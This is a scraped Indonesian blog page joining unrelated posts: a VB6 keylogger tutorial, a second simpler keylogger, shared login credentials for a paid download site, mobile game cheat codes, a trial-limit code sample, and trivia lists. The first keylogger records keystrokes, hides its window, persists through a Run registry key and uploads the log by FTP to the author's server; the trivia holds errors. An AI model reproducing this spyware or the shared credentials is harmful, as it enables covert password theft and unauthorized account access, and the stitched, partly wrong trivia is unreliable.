ElseIf GetAsyncKeyState(vbKeyDelete) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyDown) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyShift) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyTab) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyUp) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyRight) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyLeft) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyPageUp) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyPageDown) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyF1) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyF2) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyF3) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyF4) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyF5) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyF6) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyF7) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyF8) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyF9) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyF10) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyF11) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyF12) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeF13) Then
mated = mated + “
ElseIf GetAsyncKeyState(vbKeyEnd) Then
mated = mated + “
End If
End Sub

timer2:
Private Sub Timer2_Timer()
Timer3.Enabled = True
Timer2.Enabled = False
End Sub

timer3:
Private Sub Timer3_Timer()
Timer4.Enabled = True
Timer3.Enabled = False
End Sub

timer4:
Private Sub Timer4_Timer()
Timer5.Enabled = True
Timer4.Enabled = False
End Sub

timer5:
Private Sub Timer5_Timer()
Timer6.Enabled = True
Timer5.Enabled = False
End Sub

timer6:
Private Sub Timer6_Timer()
Dim file As String
Dim ftpwebsite As String
account = “Akun_web_mu”
pswd = “Pass_web_mu”
ftpwebsite = “ftp://alamat_web_mu.com”
Inet1.URL = ftpwebsite
Inet1.UserName = account
Inet1.Password = pswd
file = “log.txt”
Inet1.Execute Inet1.URL, “PUT C:\WINDOWS\system32\keylog.txt ” & file
Do While Inet1.StillExecuting = True
DoEvents
Loop
Timer6.Enabled = False
Timer2.Enabled = True
End Sub

Form:
Private Sub Form_Load()
‘ fungsi ini untuk membuat keylogg aktif saat windows dinyalakan
Set reg = CreateObject(”Wscript.shell”)
reg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\CTFloader”, App.Path & “\nama_keylogger.exe”
Dim reani As Long
Dim mated As String
SystemParamsLong SPI_GETKEYBOARDSPEED, 0, reani, 0
Timer1.Interval = reani + 150
End Sub

Private Sub mated_Change()
Open “C:\WINDOWS\system32\keylogger.txt” For Output As #1
Print #1, “Data KeyLogg – Reanimated Zone: ” & mated.Text & “, ”
Close #1
End Sub

Oh ya, hampir lupa, pada properties formnya ganti properties Show In Taskbar menjadi false agar Keylogg tidak terlihat di taskbar
dan peroperties Visible menjadi false agar aplikasi tidak memperlihatkan formnya[mode stealth]
that’s sh*t, eh.. sory, thats it!
Wassalam….

Sabtu, 13 Februari 2010

Keylooger menggunakan VB 6.0

Pernah dengar Keylogger ? Tentunya pernah bagi anda yang suka berkutat dengan dunia komputer dan internet. Karena penting bagi kita, untuk menjaga privasi (password dan akun) yang kita miliki dalam dunia maya. Karena bisa saja saat kita berselancar di dunia netting, dengan menggunakan komputer orang lain (warnet/teman) telah dipasang suatu alat lunak bernama Keylogger untuk mencatat aktifitas yang kita ketikan melalui keybord. Tuing…. Bisa saja akun email, blog,web, dll di ambil alih oleh orang yang memanfatkan Keylogger tersebut. Bagai mana she membuat keylogger, Key logger sesungguhnya biasanya di jadikan seperti virus agar tidak bisa terdeteksi keberadanya. Namun tujuan utamanya hanya satu, yaitu mencatat aktifitas key board. Kali ini kita akan membuat keylogger sederhana (fungsi utama), yang mampu mencatat aktifitas user yang dilakukan melalui tombol keyboard. Okay, dalam tutor ini kita memakai visual basic 6.0, bagi anda yang suka bercoding bahasa lain juga tidak masalah karena yang kita butuhkan disini hanyalah 1 fungsi API. Pembuatan Taruhlah 2 komponen pada form, yaitu Textbox dan Timer dengan properti sbb:
Timer (name:Timer1,interval:200)
Textbox(name:Text1,Multiline:True)
Lihat gambar berikut !
Lalu tuliskan codingnya di balik jendela code form !
Private Declare Function GetAsyncKeyState Lib “user32″ (ByVal vKey As Long) As Integer
Private Function GetKey() As String
Dim Num As Byte
For Num = 33 To 122
If GetAsyncKeyState(Num) <> 0 Then
GetKey = Chr(Num)
Exit For
End If
Next
End Function
Private Sub Timer1_Timer()
Text1.Text = Text1.Text & GetKey
End Sub
Penjelasan
GetAsyncKeyState, adalah fungsi API untuk mengecek apakah sedang ada tombol yang ditekan (dengan nilai ASC dalam parameternya). Maka jika ada tombol yang sedang di tekan (dengan nilai asc pada paramaternya – vKey) dia akan mengembalikan nilai bukan 0 (ndok), namun jika saat dia dipanggil tidak ada tombol yang ditekan maka dia mengembalikan nilai 0 (ndok)
Interval 200, pada timer menunjukan, proses pengecekan dilakukan 1/5 detik. Dengan kecepatan ini, terkadang Keylogger menangkap 1 tombol dengan 2 kali output. Namun ini lebih baik, dari pada kita memakai interval yang rendah, karena bisa saja ketikan tidak tertangkap dengan sempurna.
Textbox,kita pakai untuk menampung ketikan user.
OK kira – kira cukup sampai disini, bias dikembangkan sendiri.Silahkan jalankan maka program akan menangkap aktifitas tangan pada keyboard anda bukan pada celana anda lho.. Ha9x. :)
Download contoh projeknya !

FREE ALL

setelah blogwalking di blog mas hariyanto yang mengajari betul tentang blog ini mulai dari template dan membuat link menu dengan baik hati , yang websitenya bisa dibuka lewat sini

saya dapat ilmu triks untuk download semua file yang tercantum dijudul diatas .
mulai game hingga aplikasi ada .
silahkan dicoba trik dibawah ini :

>> masuk di http://www.fullreleasez.com
>> setelah itu pada bagian members masukan

Username : Af872HskL
Password : XjsdH28N

jika tidak memasukan username dan password, anda tidak bisa download filenya kalau anda ingin mendaftar sendiri anda harus mengeluarkan uang sekitar $50 .
jadi tidak perlu repot lagi tinggal copy paste aja username dan password diatas .
dan download, selesai . . . .



@info :
ternyata bukan hanya tempat buat download , disitu jugapun kadang membagi-bagikan account premium rapidshare gratis .
jadi cepat-cepat rebut account premium rapidsharenya .


belum dapat account premium rapidshare ?
gampang tinggal klik disini


masih bingung ?
silahkan tinggalkan komentar .


semoga bermanfaat .. .. ..

Cheat Game Gameloft Di HP

saya lagi iseng nih untuk posting Cheat game-game hp.
rata-rata game yang saya pakai gameloft, jadi ditulis disini aja. hehehe

yang hobi nge-game di hape cocok nii untuk dipakai.
langsung aja ya,
nii sebagian cheatnya:


GT Racing: Motor Academy
In main menu, press #1379*
In a race (event) press * to complete a Lap/event (or go to Line)


Asphalt Urban GT 2
73911 - in menu

Big Range Hunting
*1397 - all levels

Brothers in Arms: Art of War
#1973 - enter the menu to activate cheats
in game:
# 4 - all levels
# 7 - god mode
# 0 - infinite ammo

Castle of Magic
1973 - enter the menu to unlock all levels

King Kong
*#198327# - enter the menu to unlock all levels

The OC
*2468# - cheat menu


Nitro Street Racing 2
To unlock everything -> in the main menu, press 1379#
To win the race -> press *, while playing


Guitar Rock Tour 2
On main menu, press 1973*.
Enable Cheats to see Options :
God Mode
Power Riff Full
Instant Win
Unlock All


Bubble Bash 2 :
On Main Menu press *1379#, the game show a message
"Cheater!!! You have Unlocked the all levels screen!"


Terminator : Salvation
On Main Menu, press *3971#


Uno cheat
Press 1379 on menu to enable cheat. While on your step on gameplay press # to popup a cheat menu. Press 1973 to unlock all icon on menu.
Spring Break Fever
press *1973 on menu screen


Zombie Infection cheat:
#1979 on main menu - God Mode


Hero of Sparta
In main menu, press *1379 !
Press 5 or OK for activate the options, press 2x 5 or OK for desactivate !


Ferrari GT: Evolution Cheats.
1. To Activate Cheat Mode & Unlock All: #1379* (type on Main Menu)
2. To Win Race In 1st Place: #1379* (type during gameplay)
3. For Light Version Press 21683 On Menu


Rayman: Raving Rabbids TV Party
1000 Carrots: In Main Menu, press *1973, appear a window, press button 3 and button 5 !

Chuck Norris - Bring on the pain
Press *1397* on Menu Screen to enable the level selector
Press *7931* while playing to toggle immortality

ASPHALT 4 : ELITE RACING
TO ACTIVATE CHEAT MODE & UNLOCK ALL: #1379* (type on Main Menu)
TO WIN RACE In 1st Place: #1379* (type during gameplay)
FOR LIGHT VERSION PRESS 21683 ON MENU

ASPHALT 3 HD
ON LOCATION MENU PRESS #13791

PRINCE OF PERSIA CLASSIC
ON MAIN MENU PRESS 3331

BLOCK BREAKER DELUXE
ON MENU PRESS *1397*TO ACTIVATE CHEAT CODES AND ON ISLAND PRESS #3179# TO UNLOCK EVERYTHING
WHEN PLAYING GAME PRESS '0' TO ACTIVATE SHIELD
PRESS '3' TO GAIN ONE LIFE
PRESS '9' TO EARN 1000K

BLOCK BREAKER DELUXE 2
PRESS #*1379# TO ACTIVATE CHEAT CODES ON ISLAND SELECT # TO DISPLAY CHEAT MENU SELECT TOTAL UNLOCK WHEN PLAYING GAME PRESS '0' TO ACTIVATE SHIELD
PRESS '3' TO GAIN ONE LIFE
PRESS '9' TO EARN 1000K

XIII COVERT IDENTITY
PRESS *1379#99 TO UNLOCK EVERYTHING AND PRESS *1379# AT SHOP


XTREME DIRT BIKE
PRESS *137962#

KO FIGHTERS PRESS *1379#

America's Army: Special Operations
Unlock Everything - On Menu Screen, press Up *360
Full Health - While playing, press Up *3715
Maximum Power - While ...

Cukup disini ya.
kapan-kapan saya update deh cheatnya.
gmn sih bisa dapat cheat itu? mudah kog tinggal gabung di forumnya gameloft aja. hehehehe
disini : http://forum.gameloft.com/

Membuat Software Trial Menggunakan VB 6.0

Program trial biasanya di gunakan untuk mempromosikan suatu aplikasi atau software dengan tujuan agar calon pembeli bisa mencoba atau mencicipi program atau aplikasi tersebut sebelum dibeli.
Setau saya jenis program trial itu ada 2, yaitu pembatasan  penggunaan program dengan jumlah hari dan pembatasan dengan berapa kali program di pakai atau di gunakan.

Naah..disini saya mencoba program trial dengan pembatasan berapa kali program di jalankan. Dalam contoh ini saya membatasi pemakaian hanya bisa 30 kali, anda bisa mengubahnya sesuai keinginan anda.
Berikut adalah kodingnya, tulis di jendela kode pada VB 6 tentunya .hee
Private Sub Form_Load()
Dim x
Dim y
Dim jumlah
Dim sisa
MsgBox “Program ini hanya dapat dipakai 30 kali”
x = GetSetting(“Y”, “Y”, “Y”)jumlah = Val(x) + 1
SaveSetting “Y”, “Y”, “Y”, jumlah
Me.Label1.Caption = “Program ini sudah di gunakan sebanyak ” _
& jumlah & ” kali “
sisa = 30 – jumlah
Me.Label2.Caption = “Sisa pemakaian : ” & sisa & ” kali “
If jumlah > 30 Then
MsgBox “Batas Pemakaian Sudah habis ” + vbCrLf + _
“Untuk dapat memakai program ini lagi,” + vbCrLf + _
“      Anda harus mendaftar!!!”
Unload Me
End If
End Sub

Sedikit penjelasan tentang koding di atas:
  1. MsgBox “Program ini hanya dapat dipakai 30 kali
    saat pertama kali program di jalankan akan muncul pesan yang di bold, kurang lebih seperti gambar di bawah ini.
  2. maTLey
  3. x = GetSetting(“Y”, “Y”, “Y”)
    jumlah = Val(x) + 1
    SaveSetting “Y”, “Y”, “Y”, jumlahGetSetting

    artinya langsung menyimpan ke registri pada komputer, dan setiap kali program atau aplikasi di buka maka akan bertambah 1.
  4. If jumlah > 30 Then
    MsgBox “Batas Pemakaian Sudah habis ” + vbCrLf + _
    Untuk dapat memakai program ini lagi,” + vbCrLf + _
    Anda harus mendaftar!!!

    Jika program atau aplikasi telah di pakai sampai 30 kali, maka akan muncul pesan yang di bold.
Silahkan download contoh projectnya disini.
Semoga bermanfaat…

10 Tempat Paling Ekstrem Di Dunia

1. Lut Desert (Iran): Tempat Terpanas di Bumi 159 °F (71 °C)




Ada diskusi besar tentang tempat terpanas di bumi. Banyak yang percaya di Al Azizyah, Libya, dengan suhu tercatat 136 derajat Fahrenheit (57,8 derajat celcius), dan tempat terpanas kedua berada di Death Valley, California, Amerika Serikat, yaitu 134 Fahrenheit pada tahun 1913. Tetapi menurut situs lain, satelit NASA mencatat suhu permukaan setinggi 71 ° C (159 ° F) di gurun Lut Iran, konon yang ini adalah temperatur terpanas yang pernah tercatat di muka Bumi. Daerah ini, yang meliputi wilayah sekitar 480 kilometer, disebut Gandom Beriyan (panggang gandum).


2. Mt. Chimborazo (Ecuador): Titik Tertinggi dari Pusat Bumi 20,703 feet (6,310 m) di Atas Permukaan Laut



Tidak banyak orang yang tahu tentang Gunung Chimborazo di Ekuador dengan ketinggian 6.310 meter (20.703 kaki), beda sedikit dari Gunung Everest, namun memiliki perbedaan Chimborazo menjadi gunung tertinggi di atas pusat bumi. Hal ini karena Bumi memiliki poros bulat. Sebagai poros bulat, Bumi adalah yang paling luas di khatulistiwa. Chimborazo hanya satu derajat sebelah selatan khatulistiwa bumi dan pada lokasi itu adalah 6.384 kilometer dari pusat Bumi atau sekitar 2 kilometer lebih jauh dari pusat Bumi dibandingkan Gunung Everest.



3. Tristan de Cunha (UK): Pulau Berpenghuni Paling Terisolasi di Bumi Berjarak 2,000 mil dari Continent Terdekat



Kelompok pulau berpenghuni terpencil di dunia, Tristan de Cunha di selatan Samudera Atlantik, adalah pulau yang sangat kecil, dan tidak memiliki landasan. Rumah untuk 272 orang dibagiterdiri dari 8 nama keluarga, penduduk disana turun-temurun menderita keluhan seperti asma dan glaukoma. Dianeksasi oleh Britania Raya pada 1800-an, penduduk pulau memiliki kode pos dan bahasa Inggris, sementara mereka dapat memesan barang secara online, dibutuhkan waktu yang sangat lama untuk pesanan mereka datang.



4. Angels Falls (Venezuela): Air Terjun Tertinggi 3230 kaki (984 m)



Angel Falls (Salto Ángel) di Venezuela adalah air terjun tertinggi di dunia. Air terjun yang tingginya 3.230



5. Oymyakon (Russia): Tempat Terdingin di Dunia −96.2 °F (−71.2 °C)



Oymyakon adalah sebuah desa di Oymyakonsky Ulus dari Republik Sakha, Rusia, terletak di sepanjang Sungai Indigirka, 30 kilometer (20 mil) barat laut Kolyma Tomtor di Highway. Populasi adalah 800 orang. Oymyakon dikenal sebagai salah satu calon Kutub Utara Dingin, karena pada tanggal 26 Januari 1926, temperature dari -71,2 ° C (-96,2 ° F) tercatat di sana. Ini adalah suhu terendah tercatat untuk setiap lokasi yang dihuni secara permanen di Bumi. Itu juga merupakan suhu terendah tercatat di belahan bumi Utara.



6. The Dry Valleys (Antarctica): Tempat Terkering di Muka Bumi



Salah satu daerah di Antartika dikenal sebagai Lembah Kering. Di lembah ini tidak ada curah hujan lebih dari 2 juta tahun. Dengan pengecualian satu lembah, danau secara singkat yang diisi dengan air dari daratan yang mengalir sungai-sungai selama musim panas, Lembah Kering tidak mengandung uap air (air, es, atau salju). Alasan mengapa Lembah Kering ada adalah 200 mph katabatic bawah angin yang menguap semua kelembaban. Lembah-lembah kering yang aneh: kecuali beberapa batu terjal mereka adalah satu-satunya bagian dari benua Antartika tanpa es. Terletak di Trans-Antartika Range, mereka berhubungan dengan daerah pegunungan di mana penguapan (atau lebih tepatnya, sublimasi) lebih penting daripada hujan salju, sehingga semua es menghilang, meninggalkan tanah tandus kering.



7. Marianas Trench (Indonesia and Japan): Titik Terendah di Muka Bumi 35,840 kaki (10,924 m) di bawah permukaan laut



Challenger Deep di Palung Mariana (atau Marianas Trench) adalah titik terdalam di lautan bumi. Dalamnya adalah 10.924 meter (35.840 kaki) di bawah permukaan laut. Satu-satunya orang yang pernah dieksplorasi parit ini adalah Jacques Piccard dan Don Walsh. Di bagian bawah mereka tujuh mil ke bawah dan di sekeliling mereka delapan ton tekanan. Mereka mengamati ikan, udang dan makhluk lainnya hidup di bawah dasar laut.



8. Lloro (Colombia): Tempat Terbasah di Muka Bumi



Lloro, Kolombia, mendapatkan rata-rata 40 feet hujan setahun. Orang-orang yang tinggal di sana menghasilkan uang dengan menebang pohon-pohon di hutan terdekat di mana Anda dapat mengandalkan pada hujan setiap hari. Sekali lagi, ada diskusi tentang fakta ini. Cherrapunji, Utara-Timur India diperkirakan selama bertahun-tahun untuk menjadi tempat paling basah di dunia. Disini hujan rata-rata 10.820 mm dalam satu tahun, baik dari jumlah pendek dari Lloro. Tidak seperti Kolombia dimana hujan turun sepanjang tahun, Cherrapunji mendapatkan sebagian besar dari hujan selama 'monsun barat', atau musim hujan, antara bulan Juni dan Agustus. Sebenarnya, antara 1860 dan 1862 Cherrapunji ini sangat basah; antara 1 Agustus 1860 dan 31 Juli 1861 (yang tumpang tindih bagian dari 2 musim basah) 26.467 mm hujan turun.



9. Mount Thor (Canada): Tempat Vertical Tertinggi di Muka Bumi



Gunung Thor, di Auyuittuq Taman Nasional di Pulau Baffin, Nunavut, Kanada, menyediakan tempat vertikal tertinggi yaitu 4.100 kaki. Gunung Thor adalah puncak paling terkenal di Kanada, dan itu murni terbuat dari granit. Ini favorit para pencari sensasi dan pendaki. Gunung Thor dinaiki pertama kali pada tahun 1953 oleh Institut Kutub Utara Amerika Utara tim. Ada beberapa ekspedisi rappel baru-baru ini, dengan satu kematian pada tahun 2006.



10. Dead Sea (Jordan): Tempat Berelevasi Terendah di Muka Bumi 1,385 ft (422 mt) di bawah permukaan laut



Laut Mati adalah elevasi terendah di permukaan bumi di tanah kering, garis permukaan dan pantai berjarak 422 meter (1.385 kaki) di bawah permukaan laut. Di perbatasan Yordania dan Israel, jalan di sekitar Laut Mati juga menjadi jalan paling rendah di Bumi. Terkenal karena salinitas (lebih dari sepuluh kali dari Laut Mediterania), Laut Mati dikatakan menjadi rumah bagi kesehatan pertama mundur. Karena garam ekstrem konten, [b]tidak ada makhluk yang dapat bertahan hidup di laut itu, maka dinamakan demikian.
terletak di sebuah anak sungai Rio Caroni. Air terjun terbentuk saat arus sungai jatuh dari puncak Auyantepui.

Makam Harry Potter Telah Ditemukan !!!



http://img.dailymail.co.uk/i/pix/2007/10_04/PotterGraveRPY_800x562.jpg




Siapa sangka tokoh fiksi penyihir cilik Harry Potter ternyata ada dikehidupan nyata. Seperti diberitakan bahwa saat ini ditemukan sebuah makam yang bertuliskan Harry Potter pada sebuah gereja di Inggris, sebelah utara Yorkshire.

Dilansir dari media setempat, Yorkshire Evening Post, memberitakan adanya sebuah makam dengan nisan terbuat dari batu yang memberikan petunjuk bahwa dimakan tersebut dikuburkan seseorang dengan nama Harry Potter yang meninggal pada 30 April 1919.

Dari data yang terdapat dimakam tersebut, Harry meninggal pada usia 29 tahun. Sedangkan letak makam tersebut terdapat dalam areal gereja St. Lawrence, di Carlton Miniott, dekat Thirsk, North Yorkshire.



http://img.dailymail.co.uk/i/pix/2007/10_04/PotterChurchRPY_468x346.jpg



Ketika diketemukan, kondisi makam tersebut terlihat sangat tua dan tidak terurus. Sepanjang tubuh makam tersebut telah dikelilingi oleh semak belukar dan tanaman rambat, kondisi ini yang membuat makam tersebut terlihat angker.

Berita menggemparkan penemuan makam tersebut makin mengejutkan banyak orang. Pasalnya menurut pengurus makam, pendeta digereja tersebut memiliki nama belakang Rowling. Meski demikian belum diketahui ada hubungan atau tidak nama belakang ini sama dengan pengarang Novel Harry Potter, JK Rowling.

Hewan-Hewan Paling Misterius Di Dunia


Ahool

Ahool adalah kelelawar yang berukuran raksasa. Rentang sayapnya berukuran lebih dari 7 kaki. Hewan ini pernah dilihat di sekitar Jawa.

Agogwe

Agogwe adalah makhluk seperti manusia dan berukuran sangat kecil, mirip kurcaci. Sering ditemukan di Timur Afrika.

Arabhar

Arabhar yaitu ular terbang raksasa yang dipercaya berada di sekitar laut Arab.

Tsuchinoko

Spesies ular yang amat langka dan aneh, berperut gendut mirip botol atau pin boling dengan ekor yang kecil mirip ekor tikus. Pernah dilihat di Hokaido, Jepang.

Yeti

Serupa dengan Bigfoot, muncul di wilayah Himalaya.

Buru


Kadal sepanjang 15 kaki dan berwarna gelap. Ditemukan di Himalaya dan dipercaya telah punah.kira-kira wujudnya hampir menyerupai gambar di atas.

Jersey Devil

Binatang berbentuk kuda yang mempunyai sayap seperti kelelawar dan mempunyai tangan. Berdiri dengan dua kaki, ditemukan di New Jersey, Amerika Serikat.

Mokele-Mbembe

Dipercaya sebagai dinosaurus yang masih hidup di Kongo, Afrika.

Mothman

Merupakan makhluk setengah manusia dan setengah kelelawar, tidak memiliki leher, bersayap dan bermata merah. Pertama kali dilihat pada tahun 1966 dan diidentifikasikan sebagai UFH ( Unidentified Flying Humanoid).

Ogopogo

Monster laut yang serupa dengan Nessie di danau Loch Ness. Bedanya Ogopogo ditemukan di danau Okanagan, Kanada.

Hewan-Hewan Super Langka

Begitu banyak binatang-binatang di dunia ini yang memilki bermacam-macam bentuk dan karakteristik yang berbeda-beda.Bagaimana dengan binatang-binatang yang memilki bentuk yang aneh?mungkin sebagian dari kalian telah dan pernah melihat hewan tersebut atau belum pernah sama sekali oleh karena itu world of mystery akan mengungkap hewan yang paling aneh.
Berikut hewan-hewan paling aneh di dunia tersebut:

Sloth
fjb rbtchart.comSloths adalah mamalia berukuran sedang yang tinggal di Amerika Tengah dan Selatan milik keluarga Megalonychidae dan Bradypodidae, bagian dari tatanan pilosa. Kebanyakan ilmuwan menyebut dua keluarga yang Folivora subordo, sementara beberapa menyebutnya Phyllophaga.
Sloths adalah omnivora. Mereka mungkin makan serangga, kadal kecil dan bangkai, tapi makanan mereka kebanyakan terdiri atas tunas, tunas lembut, dan daun.
Sloths telah membuat adaptasi yang luar biasa untuk sebuah gaya hidup arboreal browsing. Daun, sumber makanan utama mereka, menyediakan sangat sedikit energi atau gizi dan tidak mencerna dengan mudah
Proses pencernaan dapat di alami selama sebulan atau lebih untuk menyelesaikannya. Meskipun demikian, daun memberikan sedikit energi, dan sloths berurusan dengan hal ini dengan berbagai langkah-langkah ekonomi: mereka memiliki tingkat metabolisme yang sangat rendah (kurang dari setengah dari yang diharapkan untuk makhluk ukuran mereka), dan mempertahankan suhu tubuh rendah saat aktif (30 sampai 34 derajat Celsius atau 86 ke 93 derajat Fahrenheit), dan suhu masih lebih rendah ketika beristirahat. Sloths terutama Cecropia tinggal di pohon.
Tapir
fjb rbtchart.comTapir adalahMamalia yan besar, kira-kira seperti babi dalam bentuk yang pendek dan ber moncong. Mereka mendiami hutan dan kawasan hutan Amerika Selatan, Amerika Tengah, dan Asia Tenggara.. Kerabat terdekat mereka adalah ungulates, kuda dan badak.
Hagfish
fjb rbtchart.comHagfish adalah hewan laut kelas craniates Myxini, juga dikenal sebagai Hyperotreti.Ada beberapa perdebatan tentang apakah mereka secara umum merupakan ikan (karena ada untuk lamprey), karena mereka jauh lebih primitive di garis keturunan dari kelompok lain yang secara umum didefinisikan ikan (Chondrichthyes dan Osteichthyes). Kebiasaan makan yang tidak biasa dan kemampuan memproduksi lender.Hagfish sangat popular di media sehingga para Hagfish di juluki sebagai hewan paling”menjijikkan” dari semua makhluk laut.Bagaimana menurut kalian apakah menjijikan hewan tersebut?
Hagfish berbentuk panjang,seperti ulat dan dapat memancarkan lendir dalam jumlah berlebihan yang lengket (dari spesies yang khas bernama Myxine glutinosa). Secara biologi lendir tersebut merupakan senjata yang di miliki oleh Hagfish untuk melawan dan menghindar dari musuh
Alpaca
fjb rbtchart.comThe Alpaca (Vicugna pacos) adalah spesies yang dipelihara oleh camelid di Amerika Selatan dan dikembangkan dari alpacas liar.Dalam penampilannya menyerupai seekor domba, tetapi lebih besar dan memiliki leher tegak panjang serta datang dalam berbagai warna, sedangkan domba pada umumnya dibesarkan untuk menjadi putih dan hitam.
Alpacas disimpan dalam Kelompok di ketinggian t Andes Ekuador, Peru selatan, Bolivia utara, dan utara Chili pada ketinggian 3.500-5.000 meter di atas permukaan laut.
Alpacas hanya memiliki serat bulu, bukan serat wol, digunakan untuk membuat barang rajutan dan anyaman sebanyak wol. Item ini juga dapat di gunakan sebagai selimut, sweater, topi, sarung tangan, syal, berbagai tekstil dan ponco di Amerika Selatan, kaus kaki dan mantel di bagian lain dunia. Serat bulu muncul di lebih dari 52 warna alami seperti diklasifikasikan di Peru, 12 seperti yang digolongkan di Australia dan 22 seperti yang digolongkan di Amerika.
Tarsiers
fjb rbtchart.comTarsiers adalah prosimian primata dari genus Tarsius, sebuah monotypic genus dalam keluarga Tarsiidae dan merupakan satu-satunya keluarga yang masih ada di dalam Infraordo Tarsiiformes. Para posisi filogenetik yang masih ada dalam urutan tarsiers Primata telah diperdebatkan selama ber abad-abadyang lalu.
Tarsiers memiliki mata besar dan kaki yang panjang. Kaki mereka memiliki tulang Tarsus sangat panjang. Mereka memangsa serangga, dan menangkap serangga dengan melompat ke arah mereka. Mereka juga diketahui memangsa burung dan ular. Ketika mereka melompat dari pohon ke pohon, bahkan tarsiers dapat menangkap burung bergerak.
Kehamilan berlangsung sekitar enam bulan, dan tarsiers melahirkan satu keturunan. Semua spesies tarsius aktif di malam hari dalam kebiasaan mereka, tetapi seperti banyak organisme malam beberapa individu mungkin menunjukkan kurang lebih aktivitas pada siang hari. Tidak seperti banyak hewan nokturnal Namun, tarsiers tidak memiliki daerah yang memantulkan cahaya (tapetum lucidum) dari mata. Mereka juga memiliki fovea, atipikal untuk hewan nokturnal.
Shoebill
fjb rbtchart.comThe Shoebill, Balaeniceps rex juga dikenal sebagai Whalehead adalah burung yang sangat besar terkait dengan burung bangau.
The Shoebill adalah burung yang sangat besar, rata-rata 1,2 m (4 kaki), 5.6 kg (12.3 lbs) dan 2,33 m (7,7 ft) di sayap. Dewasa terutama abu-abu, anak-anak adalah browner.Shoebill tinggal di Afrika timur tropis, rawa-rawa besar dari Sudan untuk Zambia.
Baru-baru ini ,Shoebill telah ditambahkan ke daftar ornitologi; spesies ini baru ditemukan pada abad ke-19 .Burung ini dikenal baik di Mesir dan Arab kuno.Di Mesir terdapat gambar yang menggambarkan Shoebill sementara orang-orang Arab menyebut burung itu sebagai markub abu, yang berarti satu dengan sepatu.
Blobfish
fjb rbtchart.comThe blobfish (Psychrolutes marcidus) adalah ikan yang mendiami kedalaman perairan laut lepas di pantai Australia dan Tasmania. Karena tidak dapat diakses habitatnya, jarang dilihat oleh manusia.
Blobfish dapat ditemukan pada kedalaman di mana tekanannya puluhan kali lebih tinggi daripada di permukaan laut, yang kemungkinan akan membuat kantung gas yang tidak efisien. Untuk tetap mengapung, daging dari blobfish yang pada dasarnya merupakan suatu massa agar-agar dengan kepadatan yang kurang dari air memungkinkan ikan ini melayang di atas lantai laut tanpa mengeluarkan energi pada berenang.
Pygmy monyet kecil
fjb rbtchart.comMonyet kecil Kerdil (Callithrix (Cebuella) pygmaea) adalah asli monyet di hutan hujan Brasil, tenggara Kolombia, Ekuador timur, dan timur Peru. Ini adalah salah satu primata terkecil, dengan panjang tubuh berkisar 14-16 cm (15-20 cm tidak termasuk ekor) dan monyet terkecil. Pria berat sekitar 140 gram (5 ons), dan betina hanya 120 g (4.2 ons).
Pygmy TThe monyet kecil memiliki mantel berwarna cokelat, dan ekor bercincin yang dapat di tubuhnya. Cakar mereka secara khusus diadaptasi untuk memanjat pohon, suatu sifat unik bagi spesies. Mereka adalah omnivora, memakan buah, daun, serangga, dan bahkan kadang-kadang reptil kecil. Hingga dua-pertiga dari waktu mereka dihabiskan untuk mencongkel kulit pohon untuk bergetah getah. Monyet kecil Kerdil memiliki gigi seri khusus untuk mencongkel lubang di kulit. Sayangnya, karena ukurannya yang kecil, dan gerakan cepat, sangat sulit untuk mengamati di alam liar.
Monyet kecil ini dapat hidup hingga 11 tahun.
Narwhal
fjb rbtchart.comThe Narwhal (Monodon monoceros) adalah sebuah spesies Arktik dr bangsa ikan paus. Ini adalah makhluk yang jarang ditemukan karena dapat di temukan di sebelah selatan lintang 70 ° N. Ini adalah salah satu dari dua spesies ikan paus putih dalam keluarga Monodontidae
Narwhal nama bahasa Inggris berasal dari nama Belanda narwal yang pada gilirannya berasal dari Denmark narhval yang didasarkan pada kata Norse nara, yang berarti “mayat.” Ini adalah referensi ke warna hewan. Yang Narwhal juga umumnya dikenal sebagai paus Bulan.
Di beberapa bagian dunia, Narwhal adalah bahasa sehari-hari disebut sebagai “reamfish.”
Aye-aye
fjb rbtchart.comThe Aye-aye (Daubentonia madagascariensis) adalah asli strepsirrhine di Madagaskar yang menggabungkan hewan pengerat seperti gigi yang panjang,jari tipis di tengah untuk mengisi relung ekologis yang sama sebagai pelatuk.
Axolotl
fjb rbtchart.comThe Axolotl (atau ajolote)adalah hewan yang paling terkenal di Meksiko yaitu mol salamander neotenic milik Tiger Salamander. Larva dari spesies ini gagal untuk menjalani metamorfosis. Spesies ini berasal dari danau yang mendasari Mexico City. Axolotls digunakan secara ekstensif dalam penelitian ilmiah karena kemampuan mereka untuk menumbuhkan sebagian besar bagian tubuh, kemudahan berkembang biak, dan embrio besar. Mereka biasanya disimpan sebagai hewan peliharaan di Amerika Serikat, Britania Raya, Australia, Jepang (di mana mereka dijual di bawah nama Wooper Rooper, dan negara-negara lain.
.
The star-nosed Mole
fjb rbtchart.comThe Star-nosed Mole (Condylura cristata) adalah sebuah hewan yang kecil di Amerika Utara yang ditemukan di bagian timur Kanada dan utara-timur Amerika Serikat. Ini adalah satu-satunya anggota suku Condylurini dan genus Condylura.
